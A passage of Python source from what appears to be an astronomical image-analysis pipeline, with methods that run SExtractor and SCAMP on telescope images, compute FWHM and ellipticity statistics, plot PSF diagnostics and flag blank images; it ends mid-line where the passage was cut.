##-------------------------------------------------------------------------\n ## Run SExtractor\n ##-------------------------------------------------------------------------\n def run_SExtractor(self, assoc=False, params=None, timeout=60):\n '''\n Run SExtractor on image.\n '''\n start_time = datetime.datetime.now()\n\n sextractor_executable = None\n try:\n result = subprocess.check_output(['sex', '-d'])\n except OSError as e:\n self.logger.debug(' Did not find source extractor executable as sex')\n try:\n result = subprocess.check_output(['sextractor', '-d'])\n except OSError as e:\n self.logger.debug(' Did not find source extractor executable as sextractor')\n else:\n sextractor_executable = 'sextractor'\n else:\n sextractor_executable = 'sex'\n\n if not sextractor_executable:\n logger.error('Could not find source extractor executable')\n return False\n\n if assoc and self.catalog_data:\n self.catalog_filter = None\n if self.header['FILTER']:\n if self.header['FILTER'] in self.catalog_data.keys():\n self.catalog_filter = self.header['FILTER']\n elif self.tel.config['catalog'][self.filter] in self.catalog_data.keys():\n self.catalog_filter = self.tel.config['catalog'][self.filter]\n else:\n self.logger.warning(' Filter in header ({}), not found in catalog table.'.format(\\\n self.header['FILTER']))\n self.catalog_filter = None\n else:\n self.catalog_filter = None\n ## Find Filter to Use\n if not self.catalog_filter:\n filters = ['r', 'R2mag', 'i', 'Imag', 'g', 'V', 'B', 'B2mag']\n for filt in filters:\n if not self.catalog_filter and (filt in self.catalog_data.keys()):\n self.logger.info(' Using {} filter for catalog magnitudes.'.format(filt))\n self.catalog_filter = filt\n if not self.catalog_filter:\n ## Choose whatever is in catalog\n self.catalog_data.keys().remove('ID')\n self.catalog_data.keys().remove('RA')\n self.catalog_data.keys().remove('Dec')\n self.catalog_filter = self.catalog_data.keys()[0]\n self.logger.info(' Using {} filter for catalog magnitudes.'.format(self.catalog_filter))\n\n ## Set up file names\n self.SExtractor_catalogfile = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".cat\")\n self.temp_files.append(self.SExtractor_catalogfile)\n\n ## Remove catalog file from previous run of SExtractor (if it exists)\n if os.path.exists(self.SExtractor_catalogfile):\n os.remove(self.SExtractor_catalogfile)\n\n sextractor_output_param_file = os.path.join(self.tel.temp_file_path,\\\n '{}.param'.format(self.raw_file_basename))\n if os.path.exists(sextractor_output_param_file):\n os.remove(sextractor_output_param_file)\n with open(sextractor_output_param_file, 'w') as defaultparamsFO:\n output_params = [\n 'XWIN_IMAGE', 'YWIN_IMAGE', \n 'AWIN_IMAGE', 'BWIN_IMAGE', 'FWHM_IMAGE', 'THETAWIN_IMAGE',\n 'ERRAWIN_IMAGE', 'ERRBWIN_IMAGE', 'ERRTHETAWIN_IMAGE',\n 'ELONGATION', 'ELLIPTICITY',\n 'FLUX_AUTO', 'FLUXERR_AUTO', 'MAG_AUTO', 'MAGERR_AUTO',\n 'FLAGS', 'FLAGS_WEIGHT', 'FLUX_RADIUS'\n ]\n if assoc: output_params.append('VECTOR_ASSOC(3)')\n for output_param in output_params:\n defaultparamsFO.write(output_param+'\\n')\n self.temp_files.append(sextractor_output_param_file)\n\n ## Compare input parameters dict to default\n SExtractor_default = {\n 'CATALOG_NAME': self.SExtractor_catalogfile,\n 'CATALOG_TYPE': 'FITS_LDAC',\n 'PARAMETERS_NAME': sextractor_output_param_file,\n 'GAIN': self.tel.gain.value,\n 'GAIN_KEY': 'GAIN',\n 'PIXEL_SCALE': '{:.3f}'.format(self.tel.pixel_scale.value),\n 'CHECKIMAGE_TYPE': 'NONE',\n }\n\n SExtractor_params = SExtractor_default\n if self.tel.SExtractor_params:\n for key in self.tel.SExtractor_params.keys():\n SExtractor_params[key] = self.tel.SExtractor_params[key]\n if params:\n for key in params.keys():\n SExtractor_params[key] = params[key]\n\n if assoc:\n ## Create Assoc file with pixel coordinates of catalog stars\n assoc_file = os.path.join(self.tel.temp_file_path, self.raw_file_basename+'_assoc.txt')\n SExtractor_params['ASSOC_NAME'] = assoc_file\n SExtractor_params['ASSOC_DATA'] = '1,2,3'\n SExtractor_params['ASSOC_PARAMS'] = '1,2,3'\n SExtractor_params['ASSOCCOORD_TYPE'] = 'PIXEL'\n if not 'ASSOC_RADIUS' in SExtractor_params.keys():\n SExtractor_params['ASSOC_RADIUS'] = '2.0'\n if not 'ASSOC_TYPE' in SExtractor_params.keys():\n SExtractor_params['ASSOC_TYPE'] = 'NEAREST'\n if not 'ASSOCSELEC_TYPE' in SExtractor_params.keys():\n SExtractor_params['ASSOCSELEC_TYPE'] = 'MATCHED'\n self.temp_files.append(assoc_file)\n if os.path.exists(assoc_file): os.remove(assoc_file)\n\n with open(assoc_file, 'w') as assocFO:\n for star in self.catalog_data:\n pix = self.image_WCS.wcs_world2pix([[star['RA'], star['Dec']]], 1)\n try:\n assocFO.write('{:8.1f} {:8.1f} {:8.1f}\\n'.format(\\\n pix[0][0], pix[0][1],\\\n star[self.catalog_filter],\\\n ))\n except ValueError:\n assocFO.write('{:8.1f} {:8.1f} {:8.1f}\\n'.format(\\\n pix[0][0], pix[0][1],\\\n float('nan'),\\\n ))\n except:\n print('Skipped: {} {} {}'.format(pix[0][0], pix[0][1], star[self.catalog_filter]))\n\n ## Add ASSOC parameters\n original_params = self.tel.SExtractor_params\n self.tel.SExtractor_params['ASSOC_NAME'] = assoc_file\n self.tel.SExtractor_params['ASSOC_DATA'] = '0'\n self.tel.SExtractor_params['ASSOC_PARAMS'] = '1,2,3'\n self.tel.SExtractor_params['ASSOC_RADIUS'] = '2.0'\n self.tel.SExtractor_params['ASSOC_TYPE'] = 'NEAREST'\n self.tel.SExtractor_params['ASSOCSELEC_TYPE'] = 'MATCHED'\n\n ## Run SExtractor\n SExtractorCommand = [sextractor_executable, self.working_file]\n for key in SExtractor_params.keys():\n SExtractorCommand.append('-{}'.format(key))\n SExtractorCommand.append('{}'.format(SExtractor_params[key]))\n self.logger.info(\"Invoking SExtractor\")\n self.logger.debug(\" SExtractor command: {}\".format(' '.join(SExtractorCommand)))\n try:\n SExSTDOUT = subprocess.check_output(SExtractorCommand, timeout=timeout,\\\n stderr=subprocess.STDOUT, universal_newlines=True)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('SExtractor timed out')\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n except OSError as e:\n if e.errno == 2:\n self.logger.error('Could not find sextractor executable. Is sextractor installed?')\n self.logger.error(\"SExtractor failed. ErrNo: {}\".format(e.errno))\n self.logger.error(\"SExtractor failed. StrErr: {}\".format(e.strerror))\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n except subprocess.CalledProcessError as e:\n self.logger.error(\"SExtractor failed. Returncode: {}\".format(e.returncode))\n self.logger.error(\"SExtractor failed. Output: {}\".format(e.output))\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n except:\n self.logger.error(\"SExtractor process failed: {0} {1} {2}\".format(\\\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]))\n self.SExtractor_results = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n else:\n for line in SExSTDOUT.splitlines():\n line.replace(\"[1A\", \"\")\n line.replace(\"[1M>\", \"\")\n MatchVersion = re.search('SExtractor (\\d+\\.\\d+\\.\\d+) started on', line)\n if MatchVersion:\n self.logger.debug(' SExtractor version = {}'.format(MatchVersion.group(1)))\n if not re.match(\".*Setting up background map.*\", line) and\\\n not re.match(\".*Line:\\s[0-9]*.*\", line):\n self.logger.debug(\" SExtractor Output: {}\".format(line))\n ## Extract Number of Stars from SExtractor Output\n pos = SExSTDOUT.find(\"sextracted \")\n IsSExCount = re.match(\"\\s*([0-9]+)\\s+\", SExSTDOUT[pos+11:pos+21])\n if IsSExCount:\n nSExtracted = int(IsSExCount.group(1))\n self.logger.info(\" SExtractor found {0} sources.\".format(nSExtracted))\n ## Extract Background Level from SExtractor Output\n pos = SExSTDOUT.find(\"Background: \")\n IsSExBkgnd = re.match(\"\\s*([0-9\\.]+)\\s*\", SExSTDOUT[pos+11:pos+21])\n if IsSExBkgnd:\n self.SExtractor_background = float(IsSExBkgnd.group(1))\n self.logger.debug(\" SExtractor background is {0:.1f}\".format(\\\n self.SExtractor_background))\n else:\n self.SExtractor_background = None\n ## Extract Background RMS from SExtractor Output\n IsSExtractor_background_RMS = re.match(\"\\s*RMS:\\s([0-9\\.]+)\\s*\",\\\n SExSTDOUT[pos+21:pos+37])\n if IsSExtractor_background_RMS:\n self.SExtractor_background_RMS = float(IsSExtractor_background_RMS.group(1))\n self.logger.debug(\" SExtractor background RMS is {0:.1f}\".format(\\\n self.SExtractor_background_RMS))\n else:\n self.SExtractor_background_RMS = None\n\n ## If No Output Catalog Created ...\n if not os.path.exists(self.SExtractor_catalogfile):\n self.logger.warning(\"SExtractor failed to create catalog.\")\n self.SExtractor_catalogfile = None\n else:\n ## Read FITS_LDAC SExtractor Catalog\n self.logger.debug(\" Reading SExtractor output catalog.\")\n with fits.open(self.SExtractor_catalogfile) as hdu:\n results = table.Table(hdu[2].data)\n\n rows_to_remove = []\n for i in range(0,len(results)):\n if results['FLAGS'][i] != 0:\n rows_to_remove.append(i)\n if len(rows_to_remove) > 0:\n results.remove_rows(rows_to_remove)\n\n self.SExtractor_results = results\n SExImageRadius = []\n SExAngleInImage = []\n assoc_x = []\n assoc_y = []\n assoc_catmag = []\n for star in self.SExtractor_results:\n SExImageRadius.append(math.sqrt((self.nXPix/2-star['XWIN_IMAGE'])**2 +\\\n (self.nYPix/2-star['YWIN_IMAGE'])**2))\n SExAngleInImage.append(math.atan((star['XWIN_IMAGE']-self.nXPix/2) /\\\n (self.nYPix/2-star['YWIN_IMAGE']))*180.0/math.pi)\n if assoc:\n assoc_x.append(star['VECTOR_ASSOC'][0])\n assoc_y.append(star['VECTOR_ASSOC'][1])\n assoc_catmag.append(star['VECTOR_ASSOC'][2])\n self.SExtractor_results.add_column(table.Column(\\\n data=SExImageRadius, name='ImageRadius'))\n self.SExtractor_results.add_column(table.Column(\\\n data=SExAngleInImage, name='AngleInImage'))\n self.n_stars_SExtracted = len(self.SExtractor_results)\n self.logger.info(\" Read in {0} stars from SExtractor catalog (after filtering).\".format(\\\n self.n_stars_SExtracted))\n if assoc:\n self.SExtractor_results.add_column(table.Column(\\\n data=assoc_x, name='assoc_x'))\n self.SExtractor_results.add_column(table.Column(\\\n data=assoc_y, name='assoc_y'))\n self.SExtractor_results.add_column(table.Column(\\\n data=assoc_catmag, name='assoc_catmag'))\n self.tel.SExtractor_params = original_params\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done running SExtractor in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Determine Image FWHM from SExtractor Catalog\n ##-------------------------------------------------------------------------\n def determine_FWHM(self, plot=False):\n '''\n Determine typical FWHM of image from SExtractor results.\n '''\n if self.n_stars_SExtracted > 1:\n self.logger.info('Analyzing SExtractor results to determine typical image quality.')\n if not self.tel.PSF_measurement_radius:\n DiagonalRadius = math.sqrt((self.nXPix/2)**2+(self.nYPix/2)**2)\n self.tel.PSF_measurement_radius = DiagonalRadius * u.pix\n self.logger.info(' Using all stars in image.')\n else:\n self.logger.info(' Using stars within {:d} pix for IQ measurement'.format(\\\n int(self.tel.PSF_measurement_radius.to(u.pix).value)))\n\n CentralFWHMs = [star['FWHM_IMAGE']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n CentralEllipticities = [star['ELLIPTICITY']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n ## Weights assumes that uncertainty on a given measurement of the\n ## FWHM is equal to 1/SNR pixels\n weights = [(star['FLUX_AUTO'] / star['FLUXERR_AUTO'])**2\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n\n if len(CentralFWHMs) > 3:\n self.FWHM_mode = mode(CentralFWHMs, 0.2) * u.pix\n self.FWHM_median = np.median(CentralFWHMs) * u.pix\n self.FWHM_average = np.average(CentralFWHMs, weights=weights) * u.pix\n self.FWHM_average_uncertainty = (np.sum(weights))**-0.5 * u.pix\n self.FWHM = self.FWHM_average\n self.ellipticity_mode = mode(CentralEllipticities, 0.05) \n self.ellipticity_median = np.median(CentralEllipticities)\n self.ellipticity_average = np.average(CentralEllipticities, weights=weights)\n self.ellipticity = self.ellipticity_median\n self.logger.debug(\" Using {0} stars in central {1} to determine PSF quality.\".format(\\\n len(CentralFWHMs),\\\n self.tel.PSF_measurement_radius))\n self.logger.debug(\" Mode FWHM in inner region is {0:.2f} pixels\".format(\\\n self.FWHM_mode.to(u.pix).value))\n self.logger.debug(\" Median FWHM in inner region is {0:.2f} pixels\".format(\\\n self.FWHM_median.to(u.pix).value))\n self.logger.info(\" Average FWHM in inner region is {0:.2f}\".format(\\\n self.FWHM_average.to(u.pix).value))\n# self.logger.info(\" Average FWHM in inner region is {0:.2f} +/- {1:.2f} pixels\".format(\\\n# self.FWHM_average.to(u.pix).value,\\\n# self.FWHM_average_uncertainty.to(u.pix).value))\n\n self.logger.debug(\" Mode Ellipticity in inner region is {0:.2f}\".format(\\\n self.ellipticity_mode))\n self.logger.debug(\" Median Ellipticity in inner region is {0:.2f}\".format(\\\n self.ellipticity_median))\n self.logger.info(\" Average Ellipticity in inner region is {0:.2f}\".format(\\\n self.ellipticity_average))\n else:\n self.logger.warning(\" Only detected {} stars in central region.\".format(\\\n len(CentralFWHMs)))\n self.logger.warning(\" No FWHM or ellipticity calculated.\")\n self.FWHM_mode = None\n self.FWHM_median = None\n self.FWHM_average = None\n self.FWHM = None\n self.ellipticity_mode = None\n self.ellipticity_median = None\n self.ellipticity_average = None\n self.ellipticity = None\n else:\n self.FWHM_mode = None\n self.FWHM_median = None\n self.FWHM_average = None\n self.FWHM = None\n self.ellipticity_mode = None\n self.ellipticity_median = None\n self.ellipticity_average = None\n self.ellipticity = None\n ## Flag FWHM\n try:\n if self.FWHM > self.tel.threshold_FWHM.to(u.pix,\\\n equivalencies=self.tel.pixel_scale_equivalency):\n self.flags['FWHM'] = True\n else:\n self.flags['FWHM'] = False\n except:\n pass\n ## Check ellipticity\n try:\n if self.ellipticity > self.tel.threshold_ellipticity:\n self.flags['ellipticity'] = True\n else:\n self.flags['ellipticity'] = False\n except:\n pass\n\n ## Make Plot if Requested\n if plot:\n self.make_PSF_plot()\n\n\n ##-------------------------------------------------------------------------\n ## Make PSF Statistics Plots\n ##-------------------------------------------------------------------------\n def make_PSF_plot(self, filename=None):\n '''\n Make various plots for analysis of image quality.\n '''\n start_time = datetime.datetime.now()\n import matplotlib.pyplot as pyplot\n\n if not self.FWHM:\n self.logger.warning('No FWHM statistics found. Skipping PSF plot creation.')\n self.PSF_plot_filename = None\n self.PSF_plot_file = None\n return\n else:\n if filename:\n self.PSF_plot_filename = filename\n else:\n self.PSF_plot_filename = self.raw_file_basename+'_PSFinfo.png'\n self.logger.info('Generating plots of PSF statistics: {}'.format(self.PSF_plot_filename))\n self.PSF_plot_file = os.path.join(self.tel.plot_file_path, self.PSF_plot_filename)\n\n ellip_threshold = 0.15\n star_angles = [star['THETAWIN_IMAGE']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n image_angles = [star['AngleInImage']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n star_x = [star['XWIN_IMAGE']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n star_y = [star['YWIN_IMAGE']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n uncorrected_diffs = [star['THETAWIN_IMAGE']-star['AngleInImage']\\\n for star in self.SExtractor_results\\\n if star['ELLIPTICITY'] >= ellip_threshold]\n\n CentralFWHMs = [star['FWHM_IMAGE']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n CentralEllipticities = [star['ELLIPTICITY']\\\n for star in self.SExtractor_results\\\n if (star['ImageRadius'] <= self.tel.PSF_measurement_radius.to(u.pix).value)]\n\n nstars = len(star_angles)\n self.logger.debug(' Found {} stars with ellipticity greater than {:.2f}.'.format(\\\n nstars, ellip_threshold))\n\n angle_diffs = []\n for angle in uncorrected_diffs:\n if angle < -90:\n angle_diffs.append(angle + 90.)\n elif angle > 90:\n angle_diffs.append(angle - 90.)\n else:\n angle_diffs.append(angle)\n angle_binsize = 10\n diff_hist, diff_bins = np.histogram(angle_diffs, bins=angle_binsize*(np.arange(37)-18))\n angle_hist, angle_bins = np.histogram(star_angles, bins=angle_binsize*(np.arange(37)-18))\n angle_centers = (diff_bins[:-1] + diff_bins[1:]) / 2\n\n ellip_binsize = 0.05\n ellip_bmin = math.floor(min(CentralEllipticities)/ellip_binsize)*ellip_binsize - ellip_binsize/2.\n ellip_bmax = math.ceil(max(CentralEllipticities)/ellip_binsize)*ellip_binsize + ellip_binsize/2.\n ellip_bins = np.arange(ellip_bmin,ellip_bmax,ellip_binsize)\n ellip_hist, ellip_bins = np.histogram(CentralEllipticities, bins=ellip_bins)\n ellip_centers = (ellip_bins[:-1] + ellip_bins[1:]) / 2\n\n fwhm_binsize = 0.2\n fwhm_bmin = math.floor(min(CentralFWHMs)/fwhm_binsize)*fwhm_binsize - fwhm_binsize/2.\n fwhm_bmax = math.ceil(max(CentralFWHMs)/fwhm_binsize)*fwhm_binsize + fwhm_binsize/2.\n fwhm_bins = np.arange(fwhm_bmin,fwhm_bmax,fwhm_binsize)\n fwhm_hist, fwhm_bins = np.histogram(CentralFWHMs, bins=fwhm_bins)\n fwhm_centers = (fwhm_bins[:-1] + fwhm_bins[1:]) / 2\n\n star_angle_mean = np.mean(star_angles)\n star_angle_median = np.median(star_angles)\n angle_diff_mean = np.mean(angle_diffs)\n angle_diff_median = np.median(angle_diffs)\n self.logger.debug(' Mean Stellar PA = {:.0f}'.format(star_angle_mean))\n self.logger.debug(' Median Stellar PA = {:.0f}'.format(star_angle_median))\n self.logger.debug(' Mean Difference Angle = {:.0f}'.format(angle_diff_mean))\n self.logger.debug(' Median Difference Angle = {:.0f}'.format(angle_diff_median))\n\n if self.PSF_plot_file:\n self.logger.debug(' Generating figure {}'.format(self.PSF_plot_file))\n\n pyplot.ioff()\n fig = pyplot.figure(figsize=(10,11), dpi=100)\n\n TopLeft = pyplot.axes([0.000, 0.750, 0.465, 0.235])\n pyplot.title('Histogram of FWHM Values for {}'.format(self.raw_file_name), size=10)\n pyplot.bar(fwhm_centers, fwhm_hist, align='center', width=0.7*fwhm_binsize)\n pyplot.plot([self.FWHM_mode.to(u.pix).value, self.FWHM_mode.to(u.pix).value],\\\n [0, 1.1*max(fwhm_hist)],\\\n 'ro-', linewidth=2, label='Mode FWHM', alpha=0.3)\n pyplot.plot([self.FWHM_median.to(u.pix).value, self.FWHM_median.to(u.pix).value],\\\n [0, 1.1*max(fwhm_hist)],\\\n 'go-', linewidth=2, label='Median FWHM', alpha=0.3)\n pyplot.plot([self.FWHM_average.to(u.pix).value, self.FWHM_average.to(u.pix).value],\\\n [0, 1.1*max(fwhm_hist)],\\\n 'bo-', linewidth=2, label='Mode FWHM', alpha=1.0)\n pyplot.xlabel('FWHM (pixels)', size=10)\n pyplot.ylabel('N Stars', size=10)\n pyplot.xlim(0,np.percentile(CentralFWHMs, 95)+1)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n TopRight = pyplot.axes([0.535, 0.750, 0.465, 0.235])\n pyplot.title('Histogram of Elliptiticty Values for {}'.format(self.raw_file_name), size=10)\n pyplot.bar(ellip_centers, ellip_hist, align='center', width=0.7*ellip_binsize)\n pyplot.plot([self.ellipticity_mode, self.ellipticity_mode], [0, 1.1*max(ellip_hist)],\\\n 'ro-', linewidth=2, label='Mode Ellipticity', alpha=0.3)\n pyplot.plot([self.ellipticity_median, self.ellipticity_median], [0, 1.1*max(ellip_hist)],\\\n 'go-', linewidth=2, label='Median Ellipticity', alpha=1.0)\n pyplot.plot([self.ellipticity_average, self.ellipticity_average], [0, 1.1*max(ellip_hist)],\\\n 'bo-', linewidth=2, label='Mode Ellipticity', alpha=0.3)\n pyplot.xlabel('Ellipticity', size=10)\n pyplot.ylabel('N Stars', size=10)\n pyplot.xlim(0,1)\n pyplot.xticks(0.1*np.arange(11), size=10)\n pyplot.yticks(size=10)\n\n MiddleLeft = pyplot.axes([0.000, 0.375, 0.465, 0.320])\n MiddleLeft.set_aspect('equal')\n pyplot.title('Average FWHM scaled from {:.1f} pix to {:.1f} pix'.format(\\\n 0.8*self.FWHM.to(u.pix).value,\\\n 2.0*self.FWHM.to(u.pix).value), size=10)\n if self.n_stars_SExtracted > 20000:\n gridsize = 20\n else:\n gridsize = 10\n pyplot.hexbin(self.SExtractor_results['XWIN_IMAGE'].data,\\\n self.SExtractor_results['YWIN_IMAGE'].data,\\\n self.SExtractor_results['FWHM_IMAGE'].data,\\\n gridsize=gridsize,\\\n mincnt=5,\\\n vmin=0.8*self.FWHM.to(u.pix).value,\\\n vmax=2.0*self.FWHM.to(u.pix).value,\\\n alpha=0.5,\\\n cmap='Reds')\n # center_region = pyplot.Circle((self.nXPix/2, self.nYPix/2),\\\n # radius=self.tel.PSF_measurement_radius/self.nXPix,\\\n # color='k')\n # MiddleLeft.add_artist(center_region)\n pyplot.xlabel('X Pixels', size=10)\n pyplot.ylabel('Y Pixels', size=10)\n pyplot.xlim(0,self.nXPix)\n pyplot.ylim(0,self.nYPix)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n MiddleRight = pyplot.axes([0.535, 0.375, 0.465, 0.320])\n MiddleRight.set_aspect('equal')\n pyplot.title('Average Ellipticity scaled from 0.25 to 0.75', size=10)\n if self.n_stars_SExtracted > 20000:\n gridsize = 20\n else:\n gridsize = 10\n pyplot.hexbin(self.SExtractor_results['XWIN_IMAGE'].data,\\\n self.SExtractor_results['YWIN_IMAGE'].data,\\\n self.SExtractor_results['ELLIPTICITY'].data,\\\n gridsize=gridsize,\\\n mincnt=5,\\\n vmin=0.25, vmax=0.75,\\\n alpha=0.5,\\\n cmap='Reds')\n # MiddleRight.add_artist(center_region)\n pyplot.xlabel('X Pixels', size=10)\n pyplot.ylabel('Y Pixels', size=10)\n pyplot.xlim(0,self.nXPix)\n pyplot.ylim(0,self.nYPix)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n BottomLeft = pyplot.axes([0.000, 0.0, 0.465, 0.320])\n pyplot.title('Correlation of Ellipticity with Image Radius', size=10)\n if self.n_stars_SExtracted > 4000:\n bins = 40\n elif self.n_stars_SExtracted > 2000:\n bins = 30\n else:\n bins = 20\n pyplot.hist2d(self.SExtractor_results['ImageRadius'],\\\n self.SExtractor_results['ELLIPTICITY'],\\\n bins=bins, cmap='binary')\n pyplot.xlabel('r (pixels)', size=10)\n pyplot.ylabel('Ellipticity', size=10)\n pyplot.xlim(0, math.sqrt(self.nXPix**2 + self.nYPix**2)/2.)\n pyplot.ylim(0, 1.0)\n pyplot.xticks(size=10)\n pyplot.yticks(size=10)\n\n BottomRight = pyplot.axes([0.535, 0.0, 0.465, 0.320])\n BottomRight.set_aspect('equal')\n pyplot.title('Correlation Between PSF Angle and Position in Image', size=10)\n pyplot.hist2d(star_angles, image_angles, bins=bins, cmap='binary')\n pyplot.xlabel('Stellar PSF PA', size=10)\n pyplot.ylabel('Image PA', size=10)\n pyplot.xlim(-100,100)\n pyplot.xticks(30*(np.arange(7)-3), size=10)\n pyplot.ylim(-100,100)\n pyplot.yticks(30*(np.arange(7)-3), size=10)\n\n pyplot.savefig(self.PSF_plot_file, dpi=100,\\\n bbox_inches='tight', pad_inches=0.10)\n pyplot.close(fig)\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making PSF plot in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n ##-------------------------------------------------------------------------\n ## Is the Image Blank\n ##-------------------------------------------------------------------------\n def is_blank(self, threshold=None, area=None):\n '''\n '''\n self.logger.info('Checking if image is blank')\n nstars_threshold = 5\n\n ## Save original SExtractor parameters\n if 'DETECT_THRESH' in self.tel.SExtractor_params.keys():\n dt = self.tel.SExtractor_params['DETECT_THRESH']\n else:\n dt = None\n if 'ANALYSIS_THRESH' in self.tel.SExtractor_params.keys():\n at = self.tel.SExtractor_params['ANALYSIS_THRESH']\n else:\n at = None\n if 'DETECT_MINAREA' in self.tel.SExtractor_params.keys():\n da = self.tel.SExtractor_params['DETECT_MINAREA']\n else:\n da = None\n ## Set new (temporary) parmaters\n if threshold:\n self.tel.SExtractor_params['DETECT_THRESH'] = threshold\n self.tel.SExtractor_params['ANALYSIS_THRESH'] = threshold\n if area:\n self.tel.SExtractor_params['DETECT_MINAREA'] = area\n \n ## Run SExtractor\n self.run_SExtractor()\n stars = [entry for entry in self.SExtractor_results if entry['FLAGS'] == 0]\n# filtered_stars = [star for star in stars if star['BWIN_IMAGE'] > 1.0]\n\n ## Edit SExtractor parameters back to original state\n if dt:\n self.tel.SExtractor_params['DETECT_THRESH'] = dt\n else:\n if 'DETECT_THRESH' in self.tel.SExtractor_params:\n del self.tel.SExtractor_params['DETECT_THRESH']\n if at:\n self.tel.SExtractor_params['ANALYSIS_THRESH'] = at\n else:\n if 'ANALYSIS_THRESH' in self.tel.SExtractor_params:\n del self.tel.SExtractor_params['ANALYSIS_THRESH']\n if da:\n self.tel.SExtractor_params['DETECT_MINAREA'] = da\n else:\n if 'DETECT_MINAREA' in self.tel.SExtractor_params:\n del self.tel.SExtractor_params['DETECT_MINAREA']\n\n ## Reset all SExtractor results to None, so we don't confuse these\n ## results with meaningful ones\n self.SExtractor_catalogfile = None\n self.SExtractor_results = None\n self.n_stars_SExtracted = None\n self.SExtractor_background = None\n self.SExtractor_background_RMS = None\n\n ## If few stars found, the image is blank\n if len(stars) < nstars_threshold:\n self.logger.warning(' Only {} bright stars detected. Image appears blank'.format(\\\n len(filtered_stars)))\n self.flags['blank'] = True\n return True\n else:\n self.logger.info(' Found {} bright stars.'.format(len(stars)))\n self.flags['blank'] = False\n return False\n\n\n ##-------------------------------------------------------------------------\n ## Run SCAMP\n ##-------------------------------------------------------------------------\n def run_SCAMP(self, params=None, timeout=90):\n '''\n Run SCAMP on SExtractor output catalog.\n '''\n if not self.image_WCS:\n self.logger.warning('No image WCS found. Skipping SCAMP.')\n self.SCAMP_successful = False\n return self.SCAMP_successful\n start_time = datetime.datetime.now()\n ## Change to tmp directory\n origWD = os.getcwd()\n os.chdir(self.tel.temp_file_path)\n\n head_filename = '{}.head'.format(self.raw_file_basename)\n head_file = os.path.join(self.tel.temp_file_path, head_filename)\n if os.path.exists(head_file):\n os.remove(head_file)\n\n ## Parameters for SCAMP\n SCAMP_default = {\n 'SAVE_REFCATALOG': 'N',\n 'REFOUT_CATPATH': self.tel.temp_file_path,\n 'MERGEDOUTCAT_NAME': os.path.join(self.tel.temp_file_path, 'scamp.cat'),\n 'MERGEDOUTCAT_TYPE': 'FITS_LDAC',\n 'CHECKPLOT_RES': '1200,1200',\n 'CHECKPLOT_TYPE': 'NONE',\n 'SOLVE_PHOTOM': 'Y',\n 'ASTRINSTRU_KEY': 'QRUNID',\n 'WRITE_XML': 'N',\n 'XML_NAME': os.path.join(self.tel.temp_file_path, 'scamp.xml'),\n }\n\n SCAMP_params = SCAMP_default\n if self.tel.SCAMP_params:\n for key in self.tel.SCAMP_params.keys():\n SCAMP_params[key] = self.tel.SCAMP_params[key]\n if params:\n for key in params.keys():\n SCAMP_params[key] = params[key]\n\n SCAMPCommand = [\"scamp\", self.SExtractor_catalogfile]\n for key in SCAMP_params.keys():\n SCAMPCommand.append('-{}'.format(key))\n SCAMPCommand.append('{}'.format(SCAMP_params[key]))\n self.logger.info(\"Running SCAMP\")\n self.logger.debug(\" SCAMP command: {}\".format(' '.join(SCAMPCommand)))\n try:\n SCAMP_STDOUT = subprocess.check_output(SCAMPCommand, timeout=timeout,\\\n stderr=subprocess.STDOUT, universal_newlines=True)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('SCAMP timed out')\n except OSError as e:\n if e.errno == 2:\n self.logger.error('Could not find SCAMP executable. Is SCAMP installed?')\n self.logger.error(\"SCAMP failed. ErrNo: {}\".format(e.errno))\n self.logger.error(\"SCAMP failed. StrErr: {}\".format(e.strerror))\n except subprocess.CalledProcessError as e:\n self.logger.error(\"SCAMP failed. Command: {}\".format(e.cmd))\n self.logger.error(\"SCAMP failed. Returncode: {}\".format(e.returncode))\n self.logger.error(\"SCAMP failed. Output: {}\".format(e.output))\n except:\n self.logger.error(\"SCAMP process failed: {0}\".format(sys.exc_info()[0]))\n self.logger.error(\"SCAMP process failed: {0}\".format(sys.exc_info()[1]))\n self.logger.error(\"SCAMP process failed: {0}\".format(sys.exc_info()[2]))\n else:\n StartAstrometricStats = False\n EndAstrometricStats = False\n for line in SCAMP_STDOUT.splitlines():\n MatchVersion = re.search('SCAMP (\\d+\\.\\d+\\.\\d+) started on', line)\n if MatchVersion:\n self.logger.debug(' SCAMP version = {}'.format(MatchVersion.group(1)))\n if re.search('Astrometric stats \\(external\\)', line):\n StartAstrometricStats = True\n if re.search('Generating astrometric plots', line):\n EndAstrometricStats = True\n if StartAstrometricStats and not EndAstrometricStats:\n self.logger.debug(\" SCAMP Output: \"+line)\n else:\n self.logger.debug(\" SCAMP Output: \"+line)\n\n ## Populate FITS header with SCAMP derived header values in .head file\n if os.path.exists(head_file):\n self.temp_files.append(head_file)\n try:\n self.logger.info(' Writing SCAMP results to fits header on {}'.format(\\\n self.working_file))\n missfits_cmd = 'missfits 